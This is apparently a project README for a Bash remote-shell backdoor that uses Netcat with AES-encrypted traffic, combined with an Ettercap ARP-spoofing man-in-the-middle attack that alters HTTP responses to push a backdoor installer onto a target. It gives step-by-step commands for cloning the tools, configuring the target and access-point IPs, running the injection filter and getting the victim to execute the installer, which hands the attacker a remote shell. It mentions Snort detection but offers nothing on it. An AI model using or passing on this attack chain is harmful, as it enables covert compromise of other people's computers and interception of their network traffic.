Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)
This project is associated to another mine :
The main goals of this project is to implement an attack scenario as below :
- Implement backdoor like remote-shell with Bash
- Attack Man In the middle with Ettercap (like ARP Spoofing)
- Hosting a backdoor installer
- Automate data alteration to inject our backdoor inside the computer of target by a browser
- If the target run (naively) the script (ie: the backdoor installer) without reading source-code the computer is infected and the attacker will obtain a remote-access command
- Detect and prevent this kind of attack with NIDS tool as Snort
- The programming language was choose only for a Proof of Concept (POC)
- The socket layer is assumed by a portable version of Netcat. I compiled Netcat for i686 and x86_64 computer architecture a put the binary inside this project.
- The transmited data were encrypted with AES-128 (without using Cryptocat). The data are encrypted on the fly via OpenSSL.
- openssl (tested with v1.0.1j)
- ettercap (>= v0.8.1)
- etterfilter (>= v0.8.1)
- etterfilter (>= v0.8.1)
- netcat (The compiled version is "The GNU Netcat" [not BSD release] v0.7.1)
How it work ?
The backdoor-client connection work localy and remontly (inside same private network with the same access-point), ie : see "$HOST" inside "config.sh".
git clone email@example.com:pilebones/backdoorBash.git cd backdoorBash cp config.sh.sample config.sh vim config.sh ./server.sh HOST=192.168.0.x ./client.sh
.... And try to execute some shell command
git clone firstname.lastname@example.org:pilebones/backdoorBash.git git clone email@example.com:pilebones/etterfilterSamples.git git clone firstname.lastname@example.org:pilebones/hostingBackdoorInstaller.git cp backdoorBash/config.sh.sample backdoorBash/config.sh vim backdoorBash/config.sh # For export remove client.sh *.log config.sh.sample tar xvzf hostingBackdoorInstaller/export.tar.gz backdoorBash/ # Configure your vhost to hosting hostingBackdoorInstaller's project cd etterfilterSamples/inject_backdoor_installer/ # Update Redirect URL from "fake-http-redirect.txt" vim fake-http-redirect.txt IFACE=wlanX IP_AP=192.168.0.1 IP_TARGET=192.168.0.x ./run # From target try to download a shell script like "test.sh" or try with 404 Not Found page (same behavior => inject backdoor installer) # From target : "chmod +x bd_installer.sh && ./bd_installer.sh" HOST=192.168.0.x ./client.sh
This backdoor is writing in bash programming language => It work only on Unix OS.
Currently, tested only on :
- Debian 7
- Ubuntu 14.10
Warning : Some recent router/box/AP/switch prevent this kind of MiTM attack. In this case, Ettercap could relay only one-way network-packets (From target to AP but not from AP to target). So Ettercap can alter the HTTP response to redirect to the backdoor's installer.